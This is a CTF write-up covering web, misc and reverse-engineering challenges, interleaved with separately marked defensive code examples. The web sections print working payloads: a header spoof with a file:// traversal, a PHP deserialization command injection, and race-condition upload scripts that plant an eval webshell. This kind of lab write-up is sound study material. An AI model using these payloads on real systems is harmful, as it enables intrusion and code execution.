Preface: lately I have been redoing the challenges while following the big names' writeups, so this post will keep being updated~

A very bare-bones table of contents:

WEB-1 [no reproduction needed]
WEB-2 [no reproduction needed]
WEB-3 [no reproduction needed]
WEB-4 [not reproduced yet]
aessss [not reproduced yet]
rsaaaa [not reproduced yet]
92 [reproduction written up 2018-11-5 20:27]
easy_py [no reproduction needed]
N0find [not reproduced yet]
baby_arm [not reproduced yet (still setting up the environment...)]
memo__server [not reproduced yet]
cpp [pending reproduction and a detailed WP]
cyvm [not reproduced yet]
What's_it [not reproduced yet]

WEB-1

Challenge: what are you doing?

Visiting the web1 link shows "what are you doing?". Following the usual approach and checking the page source reveals a hint pointing at robots.txt

```html
what are you doing?<br /> <!-- you need to visit to robots.txt -->
```

Visiting robots.txt reveals two php files

```text
source.php
flag.php
```

flag.php is a blank page, while source.php responds with "you need to login as admin!". Looking at the source of source.php:

```html
you need to login as admin!<!-- post param 'admin' -->
```

So we need to log in as admin: POST admin=1

```html
you need to login as admin!<!-- post param 'admin' -->only 127.0.0.1 can get the flag!!
```

We need to appear to come from 127.0.0.1, so add x-client-ip:127.0.0.1 to the request headers and send the request again

```html
you need to login as admin!<!-- post param 'admin' -->you need post url: http://www.ichunqiu.com
```

Following the hint, we POST the data below and get back an image address, but the image cannot be displayed. Downloading it shows that it is actually HTML, namely the iChunQiu home page

![mark](http://upload-images.jianshu.io/upload_images/10192446-70ec099be2086805.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)

We got stuck here for quite a while. With url=https://www.ichunqiu.com plus a path, the response is the page source at that path, so we tried appending paths to download the source of flag.php, but spent ages on it without success. In the end a teammate thought of jumping directories instead: access the local file flag.php, download the returned "image", and that is the source of flag.php. The payload:

```http
POST /source.php HTTP/1.1
Host: a5c3e1b00225407882f0c49146799bc7264bdbab35e64bc6.game.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
x-client-ip:127.0.0.1
Referer: http://a5c3e1b00225407882f0c49146799bc7264bdbab35e64bc6.game.ichunqiu.com/source.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 63
Connection: keep-alive
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1541299543; UM_distinctid=16554da401239b-0683daa189f84b-4c312878-144000-16554da401358; pgv_pvi=8097842176; ci_session=b34f5f4fa25e7d36b3c6f0d3efae40f090604014; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; pgv_si=s5565527040; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1541318560; Hm_lvt_9104989ce242a8e03049eaceca950328=1541299549; Hm_lpvt_9104989ce242a8e03049eaceca950328=1541299549; Hm_lvt_1a32f7c660491887db0960e9c314b022=1541299549; Hm_lpvt_1a32f7c660491887db0960e9c314b022=1541299549
Upgrade-Insecure-Requests: 1

admin=1&url=file://www.ichunqiu.com/../../var/www/html/flag.php
```

Finally, rename the downloaded image to a .php file and we have the flag

```php
<?php
$flag="flag{2ca93a96-39e3-48c9-9377-fd79a9f1c40b}";
```
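Two things make the WEB-1 chain work: the server decides "is this request from 127.0.0.1?" from a header the client itself supplies, and the url parameter accepts any scheme, so file:// plus ../ reaches the local filesystem. The block below is an added example (my code, not part of the writeup or the challenge) that puts the naive header check next to a hardened one and adds a scheme/host allow-list for the fetch URL. The trusted-proxy address 10.0.0.5, the header names and the allow-listed host are assumptions constructed for the example.

```python
import ipaddress
from urllib.parse import urlsplit

# constructed: the only reverse proxy whose forwarded headers we believe
TRUSTED_PROXIES = {ipaddress.ip_address("10.0.0.5")}
# constructed: hosts the "url" parameter may fetch from
ALLOWED_FETCH_HOSTS = {"www.ichunqiu.com"}


def client_ip_naive(headers, remote_addr):
    """What source.php effectively does: believe a header any client can set."""
    return headers.get("X-Client-IP") or remote_addr


def client_ip_hardened(headers, remote_addr):
    """Believe a forwarded address only when the TCP peer is a known proxy.

    Assumes a single proxy that appends the real client as the last
    X-Forwarded-For entry; with more hops, walk the list from the right.
    """
    peer = ipaddress.ip_address(remote_addr)
    if peer in TRUSTED_PROXIES:
        forwarded = headers.get("X-Forwarded-For", "")
        if forwarded:
            return forwarded.split(",")[-1].strip()
    return remote_addr


def is_loopback_request(headers, remote_addr, resolver=client_ip_hardened):
    """The 'only 127.0.0.1 can get the flag' decision, with a pluggable resolver."""
    return ipaddress.ip_address(resolver(headers, remote_addr)).is_loopback


def validate_fetch_url(url, allowed_hosts=ALLOWED_FETCH_HOSTS):
    """Allow-list scheme, host and port before fetching anything on the user's behalf.

    file:// is rejected outright, so the ../ traversal never reaches the filesystem,
    and userinfo tricks such as http://allowed-host@other-host/ fail the host check.
    """
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, "scheme %r not allowed" % parts.scheme
    if not parts.hostname or parts.hostname.lower() not in allowed_hosts:
        return False, "host %r not in allow-list" % parts.hostname
    if parts.username is not None:
        return False, "userinfo in URL not allowed"
    try:
        port = parts.port
    except ValueError:
        return False, "invalid port"
    if port not in (None, 80, 443):
        return False, "port %r not allowed" % port
    return True, "ok"
```

Note that the URL check only covers the request as submitted: a fetcher that follows redirects, or a host whose DNS answer changes between check and use, still needs redirect handling and address pinning on top of this.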

web-2

Challenge: Can you hack me?

This challenge is a .swp file leak; download the .swp file and audit the source.

The .swp file is recovered on Linux with vi -r index.php.swp

Then the code audit begins...

```php
<?php
error_reporting(0);
class come{
    private $method;
    private $args;
    function __construct($method,$args) {
        $this->method = $method;
        $this->args = $args;
    }
    // runs on unserialize(): every argument goes through waf()
    function __wakeup(){
        foreach($this->args as $k => $v) {
            $this->args[$k] = $this->waf(trim($v));
        }
    }
    // blacklist filter: strips < > * ; | ? newline and space, then the word "flag"
    function waf($str){
        $str=preg_replace("/[<>*;|?\n ]/","",$str);
        $str=str_replace('flag','',$str);
        return $str;
    }
    function echo($host){
        system("echo $host");
    }
    function __destruct(){
        if (in_array($this->method, array("echo"))) {
            call_user_func_array(array($this,$this->method), $this->args);
        }
    }
}
$first='hi';
$var='var';
$bbb='bbb';
$ccc='ccc';
$i=1;
// only the first GET parameter is used, as a variable variable: ?first=x sets $first
foreach($_GET as $key => $value) {
    if($i===1)
    {
        $i++;
        $$key = $value;
    }
    else{break;}
}
if($first==="doller")
{
    @parse_str($_GET['a']);
    if($var==="give")
    {
        if($bbb==="me")
        {
            if($ccc==="flag")
            {
                echo "<br>welcome!<br>";
                $come=@$_POST['come'];
                unserialize($come);
            }
        }
        else
        {echo "<br>think about it<br>";}
    }
    else
    {
        echo "NO";
    }
}
else
{
    echo "Can you hack me?<br>";
}
?>
```

From the code we can see that we first have to pass the GET-parameter checks and only then reach the unserialize() call. The GET parameters that pass the checks are:

```text
?first=doller&a=var%3dgive%26bbb%3dme%26ccc%3dflag
```

Next, think about getting past the deserialization checks. From the challenge code, the __wakeup method runs a waf that filters characters. So the idea was CVE-2016-7124, found via Google: when the value giving the number of object properties in the serialized string is larger than the real number of properties, __wakeup is skipped. This worked locally but not remotely... painful. Back to the code audit: the slash is not filtered, and the space can be replaced with IFS. Also learned from these reference links:

https://www.knowsec.net/archives/341/

https://blog.csdn.net/qq_42196196/article/details/81217375?utm_source=blogkpcl1

So the payload:

```http
POST /?first=doller&a=var%3dgive%26bbb%3dme%26ccc%3dflag HTTP/1.1
Host: f927629d24dd4e0b84ef5e917d89dba041b03b9deb3641d9.game.ichunqiu.com
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 127

come=O:4:"come":2:{s:12:"%00come%00method";s:4:"echo";s:10:"%00come%00args";a:2:{i:0;s:18:"`cat$IFS/flflagag`";i:1;s:3:"hjj";}}
```
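Before unserialize() ever sees input like the come= parameter above, a defender can inspect the serialized string itself. The following is an added example (my code, not the challenge's or the writeup's) of a small parser for PHP's serialize() grammar that records, for every object, the declared property count versus the members actually present (the mismatch that the CVE-2016-7124 __wakeup bypass relies on) and any private/protected names (the \0class\0prop form, which is how the %00come%00method keys above arise). The sample strings are constructed here. The fix on the PHP side is to not unserialize untrusted data at all, or at least to pass ['allowed_classes' => false].

```python
import re
from urllib.parse import unquote


class PhpSerializeError(ValueError):
    """Raised when the input does not follow the serialize() grammar."""


# \0class\0prop marks a private property, \0*\0prop a protected one
_MANGLED = re.compile(r"\x00(\*|[^\x00]+)\x00(.+)", re.S)


def _read_until(s, i, stop):
    end = s.index(stop, i)
    return s[i:end], end + 1


def _parse(s, i, objects):
    """Parse one value at s[i]; append a record to `objects` for every object seen."""
    t = s[i]
    if t == "N":                                   # N;
        return None, i + 2
    if t in ("b", "i"):                            # b:1;  i:42;
        raw, i = _read_until(s, i + 2, ";")
        return (int(raw) if t == "i" else raw == "1"), i
    if t == "s":                                   # s:<len>:"<bytes>";
        n, i = _read_until(s, i + 2, ":")
        n = int(n)
        val = s[i + 1:i + 1 + n]
        if s[i + 1 + n:i + 3 + n] != '";':
            raise PhpSerializeError("string length mismatch at offset %d" % i)
        return val, i + 3 + n
    if t == "a":                                   # a:<n>:{key;value;...}
        n, i = _read_until(s, i + 2, ":")
        i += 1                                     # skip '{'
        items = {}
        for _ in range(int(n)):
            k, i = _parse(s, i, objects)
            v, i = _parse(s, i, objects)
            items[k] = v
        if s[i] != "}":
            raise PhpSerializeError("array not closed at offset %d" % i)
        return items, i + 1
    if t == "O":                                   # O:<len>:"<class>":<n>:{...}
        n, i = _read_until(s, i + 2, ":")
        n = int(n)
        name = s[i + 1:i + 1 + n]
        i += n + 3                                 # skip closing quote and ':'
        declared, i = _read_until(s, i, ":")
        i += 1                                     # skip '{'
        props, mangled = {}, []
        while s[i] != "}":                         # count what is really there
            k, i = _parse(s, i, objects)
            v, i = _parse(s, i, objects)
            m = _MANGLED.match(k) if isinstance(k, str) else None
            if m:
                mangled.append(m.group(2))
                k = m.group(2)
            props[k] = v
        objects.append({
            "class": name,
            "declared": int(declared),
            "actual": len(props),
            "non_public": mangled,
            "count_mismatch": int(declared) != len(props),
        })
        return props, i + 1
    raise PhpSerializeError("unsupported type %r at offset %d" % (t, i))


def inspect_php_serialized(payload, url_encoded=False):
    """Return (decoded value, list of object records) for a serialize() string."""
    if url_encoded:
        payload = unquote(payload)                 # turns %00 back into the NUL byte
    objects = []
    value, end = _parse(payload, 0, objects)
    if end != len(payload):
        raise PhpSerializeError("trailing data after offset %d" % end)
    return value, objects


def looks_like_wakeup_bypass(payload, url_encoded=False):
    """True if any object declares more (or fewer) properties than it carries."""
    _, objects = inspect_php_serialized(payload, url_encoded)
    return any(o["count_mismatch"] for o in objects)


# constructed samples in the shape of the challenge's come object
SAMPLE_OK = ('O:4:"come":2:{s:12:"\x00come\x00method";s:4:"echo";'
             's:10:"\x00come\x00args";a:1:{i:0;s:3:"hjj";}}')
SAMPLE_BYPASS = SAMPLE_OK.replace('"come":2:', '"come":3:')
```

Any object record at all is worth alerting on when the endpoint is not supposed to deserialize objects, and a count mismatch is a strong signal on its own, since serialize() never produces one.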

WEB-3

Opening the challenge gives the source directly.

Race-condition shell upload

poc1

```python
import threading
import requests


def send(num):
    url = "http://1f59ccd88b9d491db1b14abc6ff8642bbb50265d149e41f1.game.ichunqiu.com/"
    # url = "http://web3.shb.5am3"
    file_name = "file"
    file_upload_name = "5am3.php"
    data = {
        "file[1]": "aaa",
        "file[]": "php",
        "hehe": "http://test2.5am3.com/test.php"
    }
    with open("5am3.php", "r") as f:
        file = {
            file_name: (file_upload_name, f),
        }
        # print("2")
        try:
            req = requests.post(url, data, files=file)
            # print(req.text)
            if "@" in req.text:
                print("crack ok!")
        except Exception as e:
            print("1")


def crack(threadNumber=5):
    threads = []
    for num in range(120, 121):
        threads.append(threading.Thread(target=send, args=(num,)))
    for thread in threads:
        thread.start()
        # throttle: wait until fewer than threadNumber threads are alive
        while True:
            if len(threading.enumerate()) < threadNumber:
                break


while True:
    crack()

# send(111)
```

poc2

```python
import threading
import requests


def send(num):
    url = "http://1f59ccd88b9d491db1b14abc6ff8642bbb50265d149e41f1.game.ichunqiu.com/"
    # url = "http://web3.shb.5am3"
    file_name = "file"
    file_upload_name = "5am3.php"
    data = {
        "file[1]": "aaa",
        "file[]": "php",
        "hehe": str(num) + ".php"
    }
    with open("5am32.php", "r") as f:
        file = {
            file_name: (file_upload_name, f),
        }
        # print("2")
        try:
            req = requests.post(url, data, files=file)
            # print(req.text)
            if "@" in req.text:
                print("crack ok!")
        except Exception as e:
            print("1")


def crack(threadNumber=20):
    threads = []
    for num in range(100, 900):
        threads.append(threading.Thread(target=send, args=(num,)))
    for thread in threads:
        thread.start()
        # throttle: wait until fewer than threadNumber threads are alive
        while True:
            if len(threading.enumerate()) < threadNumber:
                break


while True:
    crack()

# send(111)
```

payload:

```http
POST / HTTP/1.1
Host: 1f59ccd88b9d491db1b14abc6ff8642bbb50265d149e41f1.game.ichunqiu.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://web3.shb.5am3/
Content-Type: multipart/form-data; boundary=---------------------------21022237801674110016436295918
Content-Length: 1107
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------21022237801674110016436295918
Content-Disposition: form-data; name="file"; filename="5am3.php"
Content-Type: text/php

@<?php 
$file = 'config.php';
$code = base64_decode('QDw/cGhwCiAgICBpZihtZDUoJF9QT1NUWydwYXNzJ10pPT0iNGViZDM5N2QzZWU2NmMyMTBlM2RjNWYzYWNmOGQ5YzMiKSBldmFsKCRfUE9TVFsna24wY2snXSk7Cj8+CiAgICAgICAgICAgIAogICAg');
file_put_contents($file, $code);
?>
-----------------------------21022237801674110016436295918
Content-Disposition: form-data; name="file[1]"

sssss.asd
-----------------------------21022237801674110016436295918
Content-Disposition: form-data; name="file[]"

php
-----------------------------21022237801674110016436295918
Content-Disposition: form-data; name="hehe"

/var/sandbox/2765d621af8a58b78b4d528bd5ef7f6b/config.php
-----------------------------21022237801674110016436295918
Content-Disposition: form-data; name="pass"

5am3
-----------------------------21022237801674110016436295918
Content-Disposition: form-data; name="kn0ck"

system("cat /flag");
-----------------------------21022237801674110016436295918--
```
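WEB-3 is a write-then-check race: the upload lands in the web root first and the extension check (or the rename/removal) happens afterwards, so a request that hits the file in between gets it executed. The block below is an added example (my code, not the challenge's or the writeup's) that shows the race-prone ordering next to a handler that validates in memory, ignores any client-supplied destination such as the hehe parameter, and creates the file under a server-chosen name with O_EXCL. The between callback stands in for the concurrent request so the window can be observed deterministically; the allowed extensions, the content markers and the throwaway directory are constructed for the example.

```python
import os
import secrets
import tempfile

ALLOWED_EXT = {".png", ".jpg", ".gif"}            # constructed allow-list
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script")   # cheap content check on top of the extension


def unsafe_save(upload_dir, filename, content, between=lambda path: None):
    """The ordering behind the race: write into the web root first, check afterwards.

    `between` stands in for a concurrent request arriving while the file is live.
    """
    path = os.path.join(upload_dir, os.path.basename(filename))
    with open(path, "wb") as f:
        f.write(content)
    between(path)                                  # the window the poc scripts above race for
    if os.path.splitext(path)[1].lower() not in ALLOWED_EXT:
        os.unlink(path)
        return None
    return path


def safe_save(upload_dir, filename, content):
    """Validate in memory, ignore the client's name and path, then create with O_EXCL."""
    ext = os.path.splitext(os.path.basename(filename))[1].lower()
    if ext not in ALLOWED_EXT:
        return None
    if any(marker in content for marker in SCRIPT_MARKERS):
        return None
    path = os.path.join(upload_dir, secrets.token_hex(16) + ext)
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o644)
    with os.fdopen(fd, "wb") as f:
        f.write(content)                           # nothing is on disk before the checks pass
    return path


def demo():
    """Run both handlers in a throwaway directory and return what a reviewer wants to know."""
    webroot = tempfile.mkdtemp(prefix="upload-demo-")
    script = b"<?php echo 'not an image'; ?>"     # constructed: script content, no payload
    png = b"\x89PNG\r\n\x1a\n" + bytes(16)        # constructed: PNG signature plus padding
    live_during_window = []
    observe = lambda p: live_during_window.append(os.path.exists(p))
    result = {}
    result["unsafe_rejected"] = unsafe_save(webroot, "x.php", script, between=observe) is None
    result["unsafe_was_live"] = live_during_window == [True]   # rejected, yet live in between
    result["safe_rejects_ext"] = safe_save(webroot, "x.php", script) is None
    result["safe_rejects_content"] = safe_save(webroot, "x.png", script) is None
    stored = safe_save(webroot, "../../etc/x.png", png)
    result["safe_stored"] = (stored is not None
                             and os.path.dirname(stored) == webroot
                             and stored.endswith(".png")
                             and not os.path.basename(stored).startswith("x")
                             and os.path.getsize(stored) == len(png))
    return result
```

The ordering is the whole point: the hardened handler never has an unvalidated file in a web-served directory, so there is no window to race, and the server-chosen name means the client cannot predict where the file will land or overwrite an existing file such as config.php.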

MISC - easy_py

The pyc file structure can be analysed with 010 Editor and exported as a CSV; after some light tidying, fill in the Value column according to the variable list that 010 detects automatically and infer the actual Python code from it. From that, infer the program's encryption logic and write the decryption program.

```cpp
#include <iostream>
using namespace std;

int main()
{
    int cmp[15]={};   // the 15 expected (encrypted) values are not given in the writeup
    int q=0;
    for(int i=0;i<15;i++)
    {
        for(int j=0;j<255;j++)
        {
            // the original compared without the outer parentheses; == binds tighter than |,
            // so the comparison was only applied to the first term
            if(cmp[q] == (((~j)&102)|(j&(-103))))
            {
                q=q+1;
                cout<<(char)j;
                break;
            }
        }
    }
    return 0;
}
```

From this the decryption script can be written

cpp

Reversing shows that the flag goes through two layers of encryption; since the amount of computation is small, it can be brute-forced directly.

Final flag: flag{W0w_y0u_m4st3r_C_p1us_p1us}
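The inner loop above searches all 255 byte values for the one that maps to cmp[q]. The block below is an added example (my code, not the writeup's) that checks the identity ((~j)&102)|(j&(-103)) == j ^ 102 for every byte value, and for any other mask, which means the decryption is a single XOR rather than a search. The cmp values are still not on the page, so the sample ciphertext is constructed from a made-up plaintext.

```python
MASK = 102   # the constant from the C++ loop above; -103 is ~102


def page_expression(j, m=MASK):
    """((~j)&m)|(j&(~m)): bits of m where j is 0, plus bits of j outside m."""
    return ((~j) & m) | (j & (~m))


def is_xor_with_mask(m=MASK):
    """Check (~j & m) | (j & ~m) == j ^ m over every byte value."""
    return all(page_expression(j, m) == (j ^ m) for j in range(256))


def brute_force(cmp_bytes, m=MASK):
    """The search the C++ code performs: first j whose image equals cmp[q]."""
    out = ""
    for c in cmp_bytes:
        for j in range(255):
            if c == page_expression(j, m):
                out += chr(j)
                break
    return out


def decrypt(cmp_bytes, m=MASK):
    """Direct inversion: XOR is its own inverse, so no search is needed."""
    return "".join(chr(c ^ m) for c in cmp_bytes)


# constructed sample: what cmp[] would hold for the made-up text "flag{x}"
SAMPLE_CMP = [ord(ch) ^ MASK for ch in "flag{x}"]
```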

92

Opening the file reveals a huge pile of characters

Scrolling to the bottom shows

D0CF11E0 (the DOC file header) appears there, so the rows presumably need to be reordered; Excel does the job.

(First set the cell format to numeric, then insert a sequence number in column A (autofill strongly recommended), sort, and copy the result back.)

Paste into HxD and save as a .doc file; opening it asks for a password!

Then the last few characters of the first row turn out to be the reversed PNG file header (74E40598)

Write a script to reverse the rows

```python
# Reverse every row of the dump character by character.
# readline(32) returns at most 32 characters, so on a 32-character row the
# following call returns only the "\n", which is written back unchanged.
with open("/home/xiaolan/Desktop/get.txt", "r+") as file_read, \
        open("/home/xiaolan/Desktop/out.txt", "a+") as file_write:
    for i in range(229893):   # iteration count chosen to cover the whole dump
        str_1 = file_read.readline(32)
        file_write.writelines(str_1[::-1])
```
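The script reverses the dump row by row; what it does not do is confirm the result. The block below is an added example (my code, not the writeup's) that performs the same row reversal on a constructed two-row dump and then checks the leading bytes against the two signatures the writeup relies on, PNG (89 50 4E 47) and OLE2/DOC (D0 CF 11 E0), so a wrong transform is caught before the bytes are saved as a file.

```python
import binascii

# the two signatures the writeup relies on (first four bytes, upper-case hex)
MAGIC = {
    "89504E47": "PNG image",
    "D0CF11E0": "OLE2 compound document (legacy .doc)",
}


def reverse_rows(dump):
    """Reverse every non-empty row character by character, as the script above does."""
    return [row.strip()[::-1] for row in dump.splitlines() if row.strip()]


def identify(rows):
    """Join the rows, decode hex to bytes and look up the first four bytes."""
    data = binascii.unhexlify("".join(rows))
    sig = binascii.hexlify(data[:4]).decode().upper()
    return MAGIC.get(sig, "unknown"), data


def recover(dump):
    """Full pipeline: reverse the rows, then name the file type and return the bytes."""
    return identify(reverse_rows(dump))


# constructed sample: the PNG signature and the IHDR chunk header (16 bytes) as one
# 32-character row, followed by a zero-filled row, with each row reversed as in the challenge
SAMPLE_DUMP = "\n".join([
    "25448494D0000000A0A1A0D074E40598",   # reversed "89504E470D0A1A0A0000000D49484452"
    "00000000000000000000000000000000",
])
```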

This yields a PNG file

Scanning it gives >:2?kEaX

Decoding that gives the doc password: Passwd

Opening the document reveals

Scan again

This gives flag{XXXX+XXXX+stlganography}

Moving the QR code aside reveals

This gives flag{M1sc_+XXXX+stlganography}

Then decrypt the image

And the flag is

flag{M1sc_Off1c1_stlganography}
